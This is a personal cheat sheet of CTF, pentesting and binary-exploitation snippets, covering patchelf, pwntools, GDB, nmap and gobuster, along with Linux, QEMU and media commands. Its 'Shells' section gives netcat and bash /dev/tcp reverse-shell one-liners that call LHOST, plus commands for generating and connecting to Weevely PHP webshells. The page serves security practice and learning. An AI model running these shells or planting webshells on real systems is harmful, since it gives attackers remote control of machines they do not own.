This is a collection of CTF, pentesting, binary exploitation, and miscellaneous snippets that I use often. Click on the snippets to copy them.
Binary Security
patchelf
Use a different libc by patching the ELF's interpreter (loader) path and its library search path (rpath).
patchelf --set-interpreter ./ld.so --set-rpath . ./chall
Get libc from a .deb
If you're looking for a libc (for example, one you found on blukat.me, like this one), you can download the package for it (this example uses a .deb).
ar x libc6_2.24-11+deb9u4_amd64.deb && tar xf ./data.tar.xz
The ld and libc will be inside ./lib.
GDB Base Address
GDB uses the same base address when a program is launched from GDB (with default settings) or when ASLR (on the whole system) is turned off.
0x555555554000
CPIO Operations
Initial ramdisks for Linux-based operating environments are often stored in cpio files.
gunzip -d initramfs.cpio.gz; cpio -idm < initramfs.cpio
Here is a script for rebuilding a cpio archive.
#!/bin/bash
set -e
cd initramdisk
gcc -static exploit.c -o exploit
find . | cpio -o -H newc | gzip -c > ../new.cpio.gz
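As an added example (not from the original page), here is a dependency-free Python reader/writer for the newc cpio format the rebuild script produces, used to audit a gzip'd initramfs for setuid entries without extracting it. The sample image is constructed inline; the file names and modes in it are made up.

```python
import gzip

MAGIC = b"070701"
FIELDS = ("ino", "mode", "uid", "gid", "nlink", "mtime", "filesize", "devmajor",
          "devminor", "rdevmajor", "rdevminor", "namesize", "check")

def _pad4(n):
    # newc pads both header+name and file data out to 4-byte boundaries
    return (-n) % 4

def _entry(ino, mode, name, data):
    name_b = name.encode() + b"\0"
    hdr = MAGIC + b"".join(b"%08X" % v for v in (
        ino, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(name_b), 0))
    body = hdr + name_b
    body += b"\0" * _pad4(len(body))
    return body + data + b"\0" * _pad4(len(data))

def build_newc(files):
    """Pack {name: (mode, data)} into an uncompressed newc archive."""
    out = b"".join(_entry(i, m, n, d) for i, (n, (m, d)) in enumerate(files.items(), 1))
    return out + _entry(0, 0, "TRAILER!!!", b"")

def parse_newc(blob):
    """Return [(name, mode, data), ...] from a newc archive, stopping at TRAILER!!!."""
    entries, pos = [], 0
    while pos < len(blob):
        if blob[pos:pos + 6] != MAGIC:
            raise ValueError("bad newc magic at offset %d" % pos)
        vals = (int(blob[pos + 6 + 8 * i:pos + 14 + 8 * i], 16) for i in range(13))
        h = dict(zip(FIELDS, vals))
        name = blob[pos + 110:pos + 110 + h["namesize"] - 1].decode()
        data_start = pos + 110 + h["namesize"] + _pad4(110 + h["namesize"])
        if name == "TRAILER!!!":
            break
        entries.append((name, h["mode"], blob[data_start:data_start + h["filesize"]]))
        pos = data_start + h["filesize"] + _pad4(h["filesize"])
    return entries

def setuid_entries(gz_blob):
    """Audit a gzip'd initramfs: names of entries carrying the setuid bit (mode & 04000)."""
    return [n for n, m, _ in parse_newc(gzip.decompress(gz_blob)) if m & 0o4000]

# Constructed sample initramfs (not a real image): a normal init plus one setuid helper.
SAMPLE = gzip.compress(build_newc({
    "init": (0o100755, b"#!/bin/sh\nexec /bin/sh\n"),
    "bin/helper": (0o104755, b"\x7fELF-placeholder"),
}))
```

Archives produced by build_newc unpack with the page's `cpio -idm` command, and real initramfs images list the same way after gzip.decompress.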
pwntools
Here is an example setup/preamble for a pwntools script.
# CTF Challenge Name
# 20XX-XX-XX
from pwn import *
#################
# --- SETUP --- #
#################
context.terminal = ["tmux", "splitw", "-h"]
context.binary = binary = ELF("./binary-name", checksec=False)
if args.REMOTE:
    context.noptrace = True
    p = remote("challenge.host.example.org", 1024)
else:
    p = process(binary.path)
    gdb.attach(p, gdbscript="""
    """)
GDB
Syscalls
You can break on syscalls by using "catch", for example, 'catch syscall read' or 'catch syscall 0':
catch syscall [type or number]
Search
Search for byte pattern (gef).
search-pattern 0xffff
Set Memory
You can set arbitrary memory at arbitrary addresses with GDB.
set {char[12]}(0x555555578000) = "coolst\xffring"
Source Code Vulnerability Analysis
scan-build
Run clang's static code analyzer (C/C++), and run the web GUI (allowing all hosts to access it, useful for headless VMs):
scan-build make
scan-view --host "0.0.0.0" --allow-all-hosts /tmp/scan-build-*
weggli
Find patterns in source code (see: this blog post)
weggli --unique '$a = 0; _ / $a' ~/source-code-folder # (find divisions by zero)
Compile with clang ASAN
make LDFLAGS="-lasan" CC="clang" CFLAGS="-fsanitize=address"
Network Enumeration
nmap
This is my go-to command. It will scan all TCP ports and print them out (-v, verbose) when found.
nmap -n -Pn -v --max-retries 1 -T4 -p- RHOST
If stuck, hit 'em with the UDP scan:
nmap -sU -p- --max-retries 2 RHOST
GoBuster
Enumerate a site's directories:
gobuster dir -u http://RHOST/ -w /usr/share/wordlists/dirb/common.txt
GoBuster binaries here.
Shells
Reverse Shells
The first method uses netcat (without the -e option, for example, netcat-openbsd). On your local computer:
nc -nvlp 443
On the remote computer:
mknod /tmp/backpipe p && /bin/sh 0< /tmp/backpipe | nc LHOST 443 1> /tmp/backpipe
Second approach uses bash's built-in networking features. On local:
nc -nvlp 443
On remote:
bash -i >& /dev/tcp/LHOST/443 0>&1
PHP Shells
Weevely can generate compact binding webshells. Build:
weevely generate password ./shell.php
Connect:
weevely RHOST/shell.php password
Alternatively, you can just use p0wny. It can be found here.
Linux
Convert ova to qcow2
Down with VMWare, long live QEMU.
tar xf mycoolvm.ova && qemu-img convert -f vmdk mycoolvm.vmdk mycoolvm.qcow2
Optionally, if the VM's declared disk size is large, shrink it by re-converting:
qemu-img convert -O qcow2 mycoolvm.qcow2 mycoolvm-shrunk.qcow2
Compile the Linux Kernel
It's surprisingly easy. First clone the repo:
git clone https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
Make the config (use menuconfig for a TUI):
make defconfig
And compile it. -j8 means use 8 CPU cores.
make -j8
If you want to run it with qemu, you can use this:
qemu-system-x86_64 -kernel arch/x86_64/boot/bzImage -nographic -append "console=ttyS0" -initrd ramdisk.img -m 512 --enable-kvm -s -S # (source)
Exit QEMU with C-a c p (CTRL-a, then c, then p).
Build Docker Image
You have a docker file and you want to run it. This example uses an image called carrots that runs a service on port 80.
docker build -t carrots . && docker run -p 80:80 -d carrots:latest
Killing Network Connections
If your net utils are up to date, you can kill all connections (or, all sockets) not from your IP address.
ss -Kn '( ! src LHOST )'
Reverse SSHFS
This is not secure (a malicious guest sshd could retrieve arbitrary files from host). But it's very useful for "trusted" VMs! dpipe is from vde2.
dpipe /usr/lib/ssh/sftp-server = ssh user@RHOST sshfs :local_path remote_path -o slave,allow_other
Media
pandoc
Convert anything to anything else.
pandoc lab-details.docx -o lab.txt
ghostscript
Reduce PDF size without it looking noticeably bad.
gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/printer -dNOPAUSE -dQUIET -dBATCH -sOutputFile=output.pdf input.pdf
XLSX to CSV
Convert XLSX sheet to a CSV with gnumeric:
ssconvert --export-type=Gnumeric_stf:stf_csv random_file.xlsx gnumeric_converted.csv